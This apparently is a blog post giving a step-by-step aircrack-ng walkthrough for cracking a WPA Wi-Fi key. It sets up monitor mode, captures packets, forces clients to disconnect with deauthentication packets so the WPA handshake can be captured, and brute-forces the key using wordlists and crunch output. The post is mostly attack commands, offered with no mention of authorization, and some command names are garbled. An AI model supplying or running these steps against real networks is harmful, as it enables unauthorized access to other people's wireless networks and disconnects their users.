Cracking WPA encryption


install aircrack-ng using synaptic manager on Ubuntu (or apt-get)….or use mac ports…

open terminal…run
NOTE : airmon-ng will not work for MAC
airmon-ng

note-down your Wlan number you might need it later
run..

airmon-ng start wlan0 11

wlan0 is the name of the Interface and 11 is the channel
verify if the monitor is started by running

airmon-ng

you can check details using

iwconfig

using the following to start a aerodump to capture all wireless packets…

airodump-ng -c 11 -w psk ath0

UPDATE: on a mac you can use airport utility to create a dump/ sniff packets

you need to enable airport comand line utility. on the mac you can use airport -s to scan for all networks in range, and run
airport sniff "channel #"
to sniff all packets on the channel and log it, the .cap file can be found in /tmp folder

get the BSSID and STATION id from the aerodump and use it with aireplay-ng to send out a disconnect packet. This will force wifi devices to send out a 4way WPA authentication, that you can capture.

                          BSSID              STATION I
Daireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 mon0

once you feel you have captured enough packets(10-15k) u can use aircrack to crack the key…

aircrack-ng -w password.lst -b 00:14:6C:7E:40:80 psk*.cap

you can use this  simple C code to create word combination and pipe the STDOUT to aircrack:

permuate -d -m 8 | aircrack-ng psk*.cap -w –

of you can use and do this
crunch 9 9 abcdefg |aircrack-ng psk*.cap -w -

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s